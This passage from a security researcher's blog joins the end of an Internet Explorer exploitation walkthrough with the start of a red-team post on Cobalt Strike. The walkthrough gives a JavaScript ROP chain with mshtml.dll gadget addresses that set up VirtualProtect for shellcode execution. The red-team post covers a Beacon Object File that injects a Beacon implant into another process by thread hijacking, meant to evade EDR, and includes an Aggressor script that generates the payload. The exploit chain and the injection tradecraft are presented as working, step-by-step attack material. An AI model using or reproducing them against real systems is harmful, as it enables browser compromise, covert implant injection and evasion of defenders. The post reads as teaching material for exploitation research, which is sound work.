Similar to last time, we know we cannot place 0x00000401 on the stack, as it contains NULL bytes. Instead, we load the negative representation into EAX and negate it. We also know the dwSize parameter placeholder is 4 bytes after the lpAddress parameter placeholder. We increase ECX, which has the address of the lpAddress placeholder, by 4 bytes to place the address of the dwSize placeholder in ECX. Then, we leverage the same arbitrary write gadget again.

Perfect! We will leverage the exact same routine for the flNewProtect parameter. Instead of the negative value of 0x401, this time we need to place the negative value of 0x40 into EAX and negate it. 0x40 corresponds to the memory constant PAGE_EXECUTE_READWRITE.

rop += "\ubfd3\u750c";                     // pop eax ; ret (750cbfd3) (mshtml.dll) Place the negative representation of 0x40 (PAGE_EXECUTE_READWRITE) in EAX
rop += "\uffc0\uffff";  				   // Value from above
rop += "\u8cf0\u7504";                     // neg eax ; ret (75048cf0) (mshtml.dll) Place the actual memory constant PAGE_EXECUTE_READWRITE in EAX
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the flNewProtect parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the flNewProtect parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the flNewProtect parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the flNewProtect parameter placeholder
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for flNewProtect, with PAGE_EXECUTE_READWRITE

Great! The last thing we need to do is overwrite the last parameter placeholder, lpflOldProtect, with any writable address. The .data section of a PE will have memory that is readable and writable. This is where we will go to look for a writable address.

The end of most sections in a PE contains NULL bytes, and that is our target here, which ends up being the address 7515c010. The image above shows us the .data section begins at mshtml+534000. We can also see it is 889C bytes in size. Knowing this, we can just access .data+8000, which should be near the end of the section.
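As a quick sanity check that the chosen address really falls inside .data, the offsets can be worked out by hand. The mshtml.dll base address used below is not stated in this post. It is an assumption inferred from the IAT address 74c21308 shown earlier, so treat this as a sketch only.

```javascript
var DATA_RVA = 0x534000;      // .data begins at mshtml+534000
var DATA_SIZE = 0x889c;       // size of .data
var TARGET = 0x7515c010;      // writable address chosen in the post

// Assumption: mshtml.dll base inferred from the IAT address 74c21308 shown earlier
var MSHTML_BASE = 0x74c20000;

var offsetInData = TARGET - (MSHTML_BASE + DATA_RVA);   // 0x8010
var insideSection = offsetInData >= 0 && offsetInData + 4 <= DATA_SIZE;
```

With that base, the target sits 0x8010 bytes into .data, which leaves room for the 4 byte value VirtualProtect writes to lpflOldProtect.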

The routine here is identical to the previous two ROP routines, except there is no negation operation that needs to take place. We simply just need to pop this address into EAX and leverage our same, trusty arbitrary write gadget to overwrite the last parameter placeholder.

rop += "\ubfd3\u750c";                     // pop eax ; ret (750cbfd3) (mshtml.dll) Place a writable .data section address into EAX for lpflOldProtect
rop += "\uc010\u7515";  				   // Value from above (7515c010)
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpflOldProtect parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpflOldProtect parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpflOldProtect parameter placeholder
rop += "\uc4d4\u74e4";                     // inc ecx ; ret (74e4c4d4) (mshtml.dll) Increment ECX to get the stack address containing the lpflOldProtect parameter placeholder
rop += "\u8d86\u750c";                     // mov dword [ecx], eax ; ret (750c8d86) (mshtml.dll) Arbitrary write to overwrite stack address with parameter placeholder for lpflOldProtect, with an address that is writable

Awesome! We have fully instrumented our call to VirtualProtect. All that is left now is to kick off execution by returning into the VirtualProtect address on the stack. To do this, we will just need to load the stack address which points to VirtualProtect into EAX. From there, we can execute an xchg eax, esp ; ret gadget, just like at the beginning of our ROP chain, to return back into the VirtualProtect address, kicking off our function call. We know currently ECX contains the stack address pointing to the last parameter, lpflOldProtect.

We can see that our current value in ECX is 0x14 bytes in front of the VirtualProtect stack address. This means we can leverage 0x14 (20) dec ecx ; ret ROP gadgets to get ECX 0x14 bytes lower. From there, we can then move the ECX register into the EAX register, where we can perform the exchange.

rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\ue715\u74fb";                     // dec ecx ; ret (74fbe715) (mshtml.dll) Get ECX to the location on the stack containing the call to VirtualProtect
rop += "\u9449\u750c";                     // mov eax, ecx ; ret (750c9449) (mshtml.dll) Get the stack address of VirtualProtect into EAX
rop += "\ua1ea\u74c7";                     // xchg esp, eax ; ret (74c7a1ea) (mshtml.dll) Kick off the function call
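
The tail of the chain above is just 0x14 repetitions of one gadget followed by two more. As a rough model in C (the real chain is a JavaScript string, so this is only a sketch), the helper below fills an array with the same gadget addresses shown above. The function name build_pivot_tail and the macro names are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Gadget addresses copied from the chain above (mshtml.dll). */
#define DEC_ECX_RET      0x74fbe715u /* dec ecx ; ret */
#define MOV_EAX_ECX_RET  0x750c9449u /* mov eax, ecx ; ret */
#define XCHG_ESP_EAX_RET 0x74c7a1eau /* xchg esp, eax ; ret */

/*
 * Writes `distance` dec-ecx gadgets, then the mov and xchg gadgets, into out.
 * Returns the number of entries written, or 0 if out is too small.
 */
size_t build_pivot_tail(uint32_t *out, size_t capacity, uint32_t distance)
{
    assert(out != NULL);

    size_t needed = (size_t)distance + 2;
    if (capacity < needed) {
        return 0;
    }

    size_t n = 0;
    for (uint32_t i = 0; i < distance; i++) {
        out[n++] = DEC_ECX_RET;      /* each gadget lowers ECX by one byte */
    }
    out[n++] = MOV_EAX_ECX_RET;      /* copy the stack address into EAX */
    out[n++] = XCHG_ESP_EAX_RET;     /* pivot ESP onto that address */
    return n;
}
```

With a distance of 0x14, this produces 22 entries, matching the 20 dec ecx lines plus the final two gadgets.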

We can also replace our shellcode with some software breakpoints to confirm our ROP chain worked.

// Create a placeholder for our shellcode, 0x400 in size
shellcode = "\uCCCC\uCCCC";

for (i=0; i < 0x396/4-1; i++)
{
    shellcode += "\uCCCC\uCCCC";
}

After ECX is decremented, we can see that it now contains the VirtualProtect stack address. This is then passed to EAX, which is then exchanged with ESP to load the function call into ESP! Then, the ret part of the gadget takes the value at ESP, which is VirtualProtect, and loads it into EIP and we get successful code execution!

After replacing our software breakpoints with meaningful shellcode, we successfully obtain remote access!

Conclusion

I know this was a very long-winded blog post. It has been a bit disheartening to see a lack of beginning-to-end walkthroughs on Windows browser exploitation, and I hope I can contribute my piece to helping out those who want to get into it but are intimidated, as I am myself. Even though we are working on legacy systems, I hope this can be of some use. If nothing else, this is how I document and learn. I am excited to continue to grow and learn more about browser exploitation! Until next time.

Peace, love, and positivity :-)

Malware Development: Leveraging Beacon Object Files for Remote Process Injection via Thread Hijacking

9 January 2021 at 00:00

Introduction

As people I have interacted with will attest, my favorite subject in the entire world is binary exploitation. I love everything about it, from the problem solving aspects to the OS internals, assembly, and C side of the house. I also enjoy pushing my limits in order to find new and creative solutions for exploitation. In addition to my affinity for exploitation, I also love to red team. After all, this is what I do on a day to day basis. While I love to work my way around enterprise networks, I find myself really enjoying the host-based avoidance aspects of red teaming. I find it incredibly fun and challenging to use some of my prerequisite knowledge on exploitation and Windows internals in order to bypass security products and stay undetected (well, try to anyways). With Cobalt Strike, a very popular remote access tool (RAT), being so widely adopted by red teams - I thought I would investigate deeper into a newer Cobalt Strike capability, Beacon Object Files, which allow operators to write post-exploitation capabilities in C (which makes me incredibly happy as a person). This blog will go over a technique known as thread hijacking and integrating it into a usable Beacon Object File.

However, before beginning, I would like to make clear that this post will focus on the technique of remote process injection, thread hijacking, and thread restoration - not so much on Beacon Object Files themselves. Beacon Object Files, for our purposes, are a means to an end, as this technique can be deployed in many other fashions. As mentioned, Cobalt Strike is widely adopted and I think it is a great tool and I am a big proponent of it. I still believe at the end of the day, however, it is more important to understand the overarching concept surrounding a TTP (Tactic, Technique, and Procedure), versus learning how to just arbitrarily run a tool, which in turn will create a bottleneck in your red teaming methodology by relying on a tool itself. If Cobalt Strike went away tomorrow, that shouldn’t render this TTP, or any other TTPs, useless. However, almost contradictorily, the first portion of this post will briefly outline what Beacon Object Files are, a quick recap on remote process injection, and a bit on writing code that adheres to the needs of Beacon Object Files.

Lastly, the final project can be found here.

Beacon Object Files - You have two minutes, go.

Back in June, I saw a very interesting blog post from Cobalt Strike that outlined a new Beacon capability, known as Beacon Object Files. Beacon Object Files, stylized as BOFs, are essentially compiled C programs that are executed as position-independent code within Beacon. You bring the object file and Cobalt Strike supplies the linking. Raphael Mudge, the creator of Cobalt Strike, has a YouTube video that goes over the intrinsics, capabilities, and limitations of BOFs. I highly recommend you check out this video. In addition, I encourage you to check out TrustedSec’s BOF blog and project to supplement the available Cobalt Strike documentation for BOF development.

One thing to note before moving on is that BOFs are intended to be “lightweight” tools. Lightweight may be subjective, but as Raphael points out in his video and blog, the main benefits of BOFs are twofold:

  1. BOFs do not spawn a temporary “sacrificial” process to perform post-exploitation work - they’re directly executed as position-independent code within the current Beacon process, increasing overall OPSEC (operational security).
  2. BOFs are really meant to interact with the Windows API and the internal Beacon API, as BOFs expose a set of functions operators can use when developing. This means BOFs are smaller in size and easily allow you to invoke Windows APIs and interact with the internal Beacon API.

Additionally, there are a few drawbacks to BOFs:

  1. Cobalt Strike is the linker for BOFs - meaning libc style functions like strlen will not resolve. To compensate for this, however, you can use BOF compliant decorators in your function prototypes with the MSVCRT (Microsoft C Run-time) library and grab such functions from there. Declaring and using such functions with BOFs will be outlined in the latter portions of this post. Additionally, from Raphael’s CVE-2020-0796 BOF, there are ways to define your own C-style functions.
  2. BOFs are executed within the current Beacon process - meaning that if your BOF encounters some kind of internal error and fails, your Beacon process will crash as well. This means BOFs should be carefully vetted and tested across multiple systems, networks, and environments, while also implementing host-based checks for version information, using properly documented data types and structures outlined in a function’s prototype, and cleaning up any opened handles, allocated memory, etc.

Now that that’s out of the way, let’s get into a bit of background on remote process injection and thread hijacking, as well as outline our BOF’s execution flow.

Remote Process Injection

Remote process injection, for the unfamiliar, is a technique in which an operator can inject code into another process on a machine, under certain circumstances. This is most commonly done with a chain of Windows APIs being called in order to allocate some memory in the other process, write user-defined data (usually shellcode of some sort) to that allocation, and kick off execution by creating a thread within the remote process. The APIs VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread, respectively, are popular choices.

Why is remote process injection important? Take a look at the image below, which is a listing of processes performed inside of a Cobalt Strike Beacon implant.

As is seen above, Cobalt Strike not only discloses to the operator what processes are running, but also the user context a given process is running under. This could be very useful on a penetration test in an Active Directory environment where the goal is to obtain domain administrative access. Let’s say you as an operator obtain access to a server where there are many users logged in, including a user with domain administrative access. This means that there is a great likelihood there will be processes running in context of this high-value user. This concept can be seen below where a second process listing is performed where another user, ANOTHERUSER, has a PowerShell.exe process running on the host.

Using Cobalt Strike’s built-in inject capability, a raw Beacon implant can be injected into the PowerShell.exe process utilizing the remote injection technique outlined in the Cobalt Strike Malleable C2 profile, resulting in a second callback, in context of the ANOTHERUSER user, using the PID of the PowerShell.exe instance, process architecture (64-bit), and the name of the Cobalt Strike listener as arguments.

After the injection, there is a successful callback, resulting in a valid session in context of the OTHERUSER user.

This is useful to a red team operator, as the credentials for the OTHERUSER were not needed in order to obtain access in context of said user. However, there are a few drawbacks - including the addition of endpoint detection and response (EDR) products that detect such behavior. One of the indicators of compromise (IOC) would be, in this instance, a remote thread being created in a remote process. There are more IOCs for this TTP, but this blog will focus on circumventing the need to create a remote thread. Instead, let’s examine thread hijacking, a technique in which an already existing thread within the target process is suspended and manipulated in order to execute shellcode.

Thread Hijacking and Thread Restoration

As mentioned earlier, the process for a typical remote injection is:

  1. Allocate a memory region within the target process using VirtualAllocEx. A handle to the target process must already exist with an access right of at least PROCESS_VM_OPERATION in order to leverage this API successfully. This handle can be obtained using the Windows API function OpenProcess.
  2. Write your code to the allocated region using WriteProcessMemory. A handle to the target process must already exist with an access right of at least PROCESS_VM_WRITE and the previously mentioned PROCESS_VM_OPERATION - meaning a handle to the remote process must have both of these access rights at minimum to perform remote injection.
  3. Create a remote thread, within the remote process, to execute the shellcode, using CreateRemoteThread.

Our thread hijacking technique will utilize the first two members of the previous list, but instead of CreateRemoteThread, our workflow will consist of the following:

  1. Open a handle to the remote process using the aforementioned access rights required by VirtualAllocEx and WriteProcessMemory.
  2. Loop through the threads on the machine utilizing the Windows API CreateToolhelp32Snapshot. This loop will contain logic to break upon identifying the first thread within the target process.
  3. Upon breaking the loop, open a handle to the target thread using the Windows API function OpenThread.
  4. Call SuspendThread, passing the thread handle from the previous step as the argument. SuspendThread requires that the handle has an access right of THREAD_SUSPEND_RESUME.
  5. Call GetThreadContext, using the thread handle. This function requires that handles have a THREAD_GET_CONTEXT access right. This function will dump the current state of the target thread’s CPU registers, processor flags, and other CPU information into a CONTEXT record. This is because each thread has its own stack, CPU registers, etc. This information will be later used to execute our shellcode and to restore the thread once execution has completed.
  6. Inject the shellcode into the desired process using VirtualAllocEx and WriteProcessMemory. The shellcode that will be used in this blog will be the default Cobalt Strike payload, which is a reflective DLL. This payload will be dynamically generated with a user-specified listener that exists already, using a Cobalt Strike Aggressor Script. Creation of the Aggressor Script will follow in the latter portions of this blog post. The Beacon implant won’t be executed quite yet, it will just be sitting within the target remote process, for the time being.
  7. Since Cobalt Strike’s default stageless payload is a reflective DLL, it works a bit differently than traditional shellcode. Because it is a reflective DLL, when the DllMain function is called to kick off Beacon, the shellcode never performs a “return”, because Beacon calls either ExitThread or ExitProcess to leave DllMain, depending on what is specified in the payload by the operator. Because of this, it would not be possible to restore the hijacked thread, as the thread will run the DllMain function until the operator exits the Beacon, since the stageless raw Beacon artifact does not perform a “return”. Due to this, we must create a shellcode that our Beacon implant will be wrapped in, with a custom CreateThread routine that creates a local thread within the remote process for the Beacon implant to run. Essentially, this is one of three components our “new” full payload will “carry”, so when execution reaches the remote process, the call to CreateThread, which creates a local thread, will allocate the thread in the remote process for Beacon to run in. This means that the hijacked thread will never actually execute the Beacon implant, it will actually execute a small shellcode, made up of three components, that places the Beacon implant into its own local thread, along with two other routines that will be described here shortly. Up until this point, no code has been executed and everything mentioned is just a synopsis of each component’s purpose.
  8. The custom CreateThread routine is actually executed by being called from another routine that will be wrapped into our final payload, which is a routine for a call to NtContinue. This is the second component of our custom shellcode. After the CreateThread routine is finished executing, it will perform a return back into the NtContinue routine. After the hijacked thread executes the CreateThread routine, the thread needs to be restored with the original CPU registers, flags, etc. it had before the thread hijack occurred. NtContinue will be talked about in the latter portions of this post, but for now just know that NtContinue, at a high level, is a function in ntdll.dll that accepts a pointer to a CONTEXT record and sets the calling thread to that context. Again, no code has been executed so far. The only thing that has changed is our large “final payload” has added another component to it, NtContinue.
  9. The CreateThread routine is first prepended with a stack alignment routine, which performs bitwise AND with the stack pointer, to ensure a 16-byte alignment. Some function calls fail if they are not 16-byte aligned, and this ensures when the shellcode performs a call to the CreateThread routine, it is first 16-byte aligned. malloc is then invoked to create one giant buffer that all of these “moving parts” are added to.
  10. Now that there is one contiguous buffer for the final payload, using VirtualAllocEx and WriteProcessMemory, again, the final payload, consisting of the three routines, is injected into the remote process.
  11. Lastly, the previously captured CONTEXT record is updated so that its Rip member (a DWORD64), which represents the value of the 64-bit instruction pointer, points to the address of our full payload.
  12. SetThreadContext is then called, which forces the target thread to be updated to point to the final payload, and ResumeThread is used to queue our shellcode execution, by resuming the hijacked thread.
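
Two of the steps above are easy to model in portable C: the bitwise AND that forces 16-byte stack alignment, and the use of malloc to glue several routines into one contiguous buffer. The sketch below is only an illustration. The names align_down_16, payload_part, and concat_parts are hypothetical, and the order in which the real routines are concatenated is whatever the caller passes in, not something this sketch decides.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Clears the low four bits, which is what "and rsp, 0xFFFFFFFFFFFFFFF0" does. */
uint64_t align_down_16(uint64_t rsp)
{
    return rsp & ~(uint64_t)0xF;
}

/* One component of the final payload: a pointer to its bytes and its length. */
typedef struct {
    const unsigned char *bytes;
    size_t len;
} payload_part;

/*
 * Concatenates the parts, in the order given, into one malloc'd buffer.
 * Stores the combined length in *total_len. Returns NULL if the combined
 * length is 0 or if malloc fails. The caller frees the result.
 */
unsigned char *concat_parts(const payload_part *parts, size_t count, size_t *total_len)
{
    assert(parts != NULL && total_len != NULL);

    size_t total = 0;
    for (size_t i = 0; i < count; i++) {
        total += parts[i].len;
    }
    *total_len = total;
    if (total == 0) {
        return NULL;
    }

    unsigned char *buffer = malloc(total);
    if (buffer == NULL) {
        return NULL;
    }

    size_t offset = 0;
    for (size_t i = 0; i < count; i++) {
        if (parts[i].len > 0) {
            memcpy(buffer + offset, parts[i].bytes, parts[i].len);
            offset += parts[i].len;
        }
    }
    return buffer;
}
```

Aligning downward is the safe direction for a stack pointer, since the stack grows toward lower addresses and the rounded value never lands above the original.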

Before moving on, there is something I would like to call out: the call to CreateThread. At first glance, this may seem like it is not a viable alternative to calling CreateRemoteThread directly. The benefit of the thread hijacking technique is that even though a thread is created, it is not created from a remote process; it is created locally. This does two things: first, it avoids the common API call chain of VirtualAllocEx, WriteProcessMemory, and CreateRemoteThread, and second, it blends in (a bit more) by calling CreateThread, which is a less scrutinized API call. There are other IOCs to detect this technique. However, I will leave that as an exercise to the reader :-).

Let’s move on and start with some code.

Visual Studio + Beacon Object File Intrinsics

For this project, I will be using Visual Studio and the MSVC Compiler, cl.exe. Feel free to use mingw, as it can also produce BOFs. Let’s go over a few house rules for BOFs before we begin.

In order to compile a BOF on Visual Studio, open an x64 Native Tools Command Prompt for VS session and use the following command: cl /c /GS- INPUT.c /FoOUTPUT.o. This will compile the C program as an object file only and will not implement stack cookies, due to the Cobalt Strike linker obviously not being able to locate the injected stack cookie check functions.

If you would like to call a Windows API function, BOFs require a __declspec(dllimport) keyword, which is defined in winnt.h as DECLSPEC_IMPORT. This indicates to the compiler that this function is found within a DLL, telling the compiler essentially “this function will be resolved later” and as mentioned before, since Cobalt Strike is the linker, this is needed to tell the compiler to let the linking come later. Since the linking will come later, this also means a full function prototype must be supplied to the BOF. You can use Visual Studio to “peek” the prototype of a Windows API function. This will suffice in attributing the __declspec(dllimport) keyword to our function prototypes, as the prototypes of most Windows API functions contain a #define directive with a definition of WINBASEAPI, or similar, which already contains a __declspec(dllimport) keyword. An example would be the prototype of the function GetProcAddress, as seen below.

This reveals the __declspec(dllimport) keyword will be present when this BOF is compiled.

Armed with this information, if an operator wanted to include the function GetProcAddress in their BOF, it would be outlined as such:

WINBASEAPI FARPROC WINAPI KERNEL32$GetProcAddress(HMODULE, LPCSTR);

The value directly before the $ represents the library the function is found in. The relocation table of the object file, which essentially contains pointers to the list of items the object file needs addresses from, like functions in other libraries or object files, will point to the memory address of the prototyped LIB$Function function. Cobalt Strike, acting as the linker and loader, will parse this table and update the relocation table of the object file, where applicable, with the actual addresses of the user-defined Windows API functions, such as GetProcAddress in the above test case. This blob is then passed to Beacon as code to be executed. Not reinventing the wheel here, Raphael outlines this all in his wonderful video.
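
To make the LIB$Function naming convention a little more concrete, here is a small C sketch that splits such a name at the $ into its library and function halves. This is only a model of the convention and not how Cobalt Strike's linker is actually implemented. The function name split_bof_symbol is hypothetical, and the sketch does not handle any prefix the compiler may add to the symbol in the object file.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/*
 * Splits "LIB$Function" into lib and func (both NUL-terminated).
 * Returns 1 on success, 0 if there is no '$', if either half is empty,
 * or if an output buffer is too small.
 */
int split_bof_symbol(const char *symbol,
                     char *lib, size_t lib_cap,
                     char *func, size_t func_cap)
{
    assert(symbol != NULL && lib != NULL && func != NULL);

    const char *sep = strchr(symbol, '$');
    if (sep == NULL) {
        return 0;
    }

    size_t lib_len = (size_t)(sep - symbol);
    size_t func_len = strlen(sep + 1);
    if (lib_len == 0 || func_len == 0) {
        return 0;
    }
    if (lib_len >= lib_cap || func_len >= func_cap) {
        return 0;
    }

    memcpy(lib, symbol, lib_len);
    lib[lib_len] = '\0';
    memcpy(func, sep + 1, func_len + 1); /* copies the terminating NUL too */
    return 1;
}
```

Given KERNEL32$GetProcAddress, this yields KERNEL32 and GetProcAddress, which is the pair a loader would need in order to look the function up.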

In addition to this, I will hit on one last thing - and that is user-supplied arguments and returning output back to the operator. Beacon exposes an internal API to BOFs, which is outlined in the beacon.h header file, supplied by Cobalt Strike. For returning output back to the operator, the API BeaconPrintf is exposed, and can return output over Beacon. This API accepts an output type, one of the #define directives in beacon.h such as CALLBACK_OUTPUT and CALLBACK_ERROR, as well as a user-supplied string. For instance, updating the operator with a message would be implemented as such:

BeaconPrintf(CALLBACK_OUTPUT, "[+] Hello World!\n");

For accepting user supplied arguments, you’ll need to implement an Aggressor Script into your project. The following will be the script used for this post.

# Setup cThreadHijack
alias cThreadHijack {

    # Declare local variables for the Beacon ID and arguments
    local('$bid $listener $pid $payload');

    # Unpack the arguments (Beacon ID, PID, listener name)
    ($bid, $pid, $listener) = @_;

    # Verify the number of arguments
    if (size(@_) != 3)
    {
        berror($bid, "Error! Please enter a valid listener and PID");
        return;
    }

    # Read in the BOF
    $handle = openf(script_resource("cThreadHijack.o"));
    $data = readb($handle, -1);
    closef($handle);

    # Verify PID is an integer
    if ((!-isnumber $pid) || (int($pid) <= 0))
    {
        berror($bid, "Please enter a valid PID!\n");
        return;
    }

    # Generate a new payload 
    $payload = payload_local($bid, $listener, "x64", "thread");

    # Save a copy of the generated payload to out.bin
    $handle1 = openf(">out.bin");
    writeb($handle1, $payload);
    closef($handle1);
    
    # Pack the arguments
    # 'b' is binary data and 'i' is an integer
    $args = bof_pack($bid, "ib", $pid, $payload);

    # Run the BOF
    # go = Entry point of the BOF
    beacon_inline_execute($bid, $data, "go", $args);
}

The goal is to be able to supply our BOF to Cobalt Strike, with the very original name cThreadHijack, a PID for injection, and the name of the Cobalt Strike listener. The first local statement sets up our variables, which include the ID of the Beacon executing the BOF, the listener name, the PID, and the payload, which will be generated later. The assignment from @_ unpacks the arguments in the order they are supplied, meaning the command to use this BOF would be cThreadHijack PID "Name of listener". After, error checking is done to determine if 3 arguments have been supplied (the PID and the listener are entered by the operator, while the Beacon ID is supplied automatically without us needing to input anything). After the object file is read in and the PID is verified, the Aggressor function payload_local is used to generate a raw Cobalt Strike payload with the user-supplied listener name and an exit method. After this, the user-supplied argument $pid is packed as an integer and the newly created $payload variable is packed as a binary value. Then, upon execution in Cobalt Strike, the alias cThreadHijack is executed with the aforementioned arguments, using the function go as the main entry point. This script must be loaded before executing the BOF.

From the C code side, this is how it looks to set these arguments and define the functions needed for thread hijacking.

The function BeaconDataParse is first used, with a special datap structure, to obtain the user-supplied arguments. Then, the value int pid is set to the user-supplied PID, while the char* shellcode value is set to the Beacon implant, meaning everything is in place. Finally, now that the details on adhering to BOF’s rules while writing C are out of the way, let’s get into the code.

Open, Enumerate, Suspend, Get, Inject, and Get Out!

The first step in thread hijacking is to open a handle to the target process. As mentioned before, the handle used by VirtualAllocEx and WriteProcessMemory must have the access rights PROCESS_VM_OPERATION and PROCESS_VM_WRITE. This can be correlated to the following code.

This function accepts the user-supplied argument for a PID and returns a handle to it. After the process handle is opened, the BOF starts enumerating threads using the API CreateToolhelp32Snapshot. This routine is sent through a loop and “breaks” upon the first thread of the target PID being reached. When this happens, a call to OpenThread with the rights THREAD_SUSPEND_RESUME, THREAD_SET_CONTEXT, and THREAD_GET_CONTEXT occurs. This allows the program to suspend the thread, obtain the thread’s context, and set the thread’s context.
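
Access rights like these are just bit flags that get OR'd together into a mask. As a small illustration, the C sketch below combines the process and thread rights named in this section and checks whether a granted mask covers a required one. The constant values mirror the ones in the Windows headers, but they are redefined here so the sketch compiles anywhere (do not include windows.h alongside it), and the function names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>

/* Values as defined in the Windows headers, redefined for portability. */
#define PROCESS_VM_OPERATION  0x0008u
#define PROCESS_VM_WRITE      0x0020u
#define THREAD_SUSPEND_RESUME 0x0002u
#define THREAD_GET_CONTEXT    0x0008u
#define THREAD_SET_CONTEXT    0x0010u

/* Rights the process handle needs for VirtualAllocEx and WriteProcessMemory. */
uint32_t required_process_access(void)
{
    return PROCESS_VM_OPERATION | PROCESS_VM_WRITE;
}

/* Rights the thread handle needs to suspend, read, and set the context. */
uint32_t required_thread_access(void)
{
    return THREAD_SUSPEND_RESUME | THREAD_GET_CONTEXT | THREAD_SET_CONTEXT;
}

/* Returns 1 if every bit in required is also set in granted, otherwise 0. */
int access_covers(uint32_t granted, uint32_t required)
{
    assert(required != 0u); /* an empty requirement is likely a caller bug */
    return (granted & required) == required;
}
```

Requesting only the bits that are needed, rather than an all-access mask, keeps the handle request as narrow as the technique allows.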

At this point, the goal is to suspend the identified thread, in order to obtain its current CONTEXT record and later set its context again.

Once the thread has been suspended, the Beacon implant is remotely injected into the target process. This will not be the final payload the hijacked thread will execute, this is simply to inject the Beacon implant into the remote process in order to use this address later on in the CreateThread routine.

Now that the remote thread is suspended and our Beacon implant shellcode is sitting within the remote process address space, it is time to implement a BYTE array that places the Beacon implant in a thread and executes it.

Beacon - Stay Put!

As previously mentioned, the first goal will be to place the already injected Beacon implant into its own thread. Currently, the implant is just sitting within the desired remote process and has not executed. To do this, we will create a 64-byte BYTE array that will contain the necessary opcodes to perform this task. Let’s take a look at the CreateThread function prototype.

HANDLE CreateThread(
  LPSECURITY_ATTRIBUTES   lpThreadAttributes,
  SIZE_T                  dwStackSize,
  LPTHREAD_START_ROUTINE  lpStartAddress,
  __drv_aliasesMem LPVOID lpParameter,
  DWORD                   dwCreationFlags,
  LPDWORD                 lpThreadId
);

As mentioned by Microsoft documentation, this function will create a thread to execute within the virtual address space of the calling process. Since we will be injecting this routine into the remote process, when the routine is executed, it will create a thread within the remote process. This is beneficial to us, as CreateThread creates a local thread - but since the routine will be executed inside of the remote process, it will spawn a local thread there, instead of requiring us to create a thread, remotely, from our current process.

The function argument we will be worried about is lpStartAddress, of type LPTHREAD_START_ROUTINE, which is really just a function pointer to whatever the thread will execute. In our case, this will be the address of our previously injected Beacon implant. We already have this address, as VirtualAllocEx has a return value of type LPVOID, which is a pointer to our shellcode. Let’s get into the development of the routine.

The first step is to declare a BYTE array of 64 bytes. 64 bytes was chosen because it is a multiple of the size of a QWORD (8 bytes, the size of a 64-bit address). This ensures proper alignment, meaning 8 QWORDs will be used for this routine - which keeps everything nice and aligned. Additionally, we will declare an integer variable to use as a “counter” in order to make sure we are placing our opcodes at the correct index within the BYTE array.

BYTE createThread[64] = { 0 };
int z = 0;

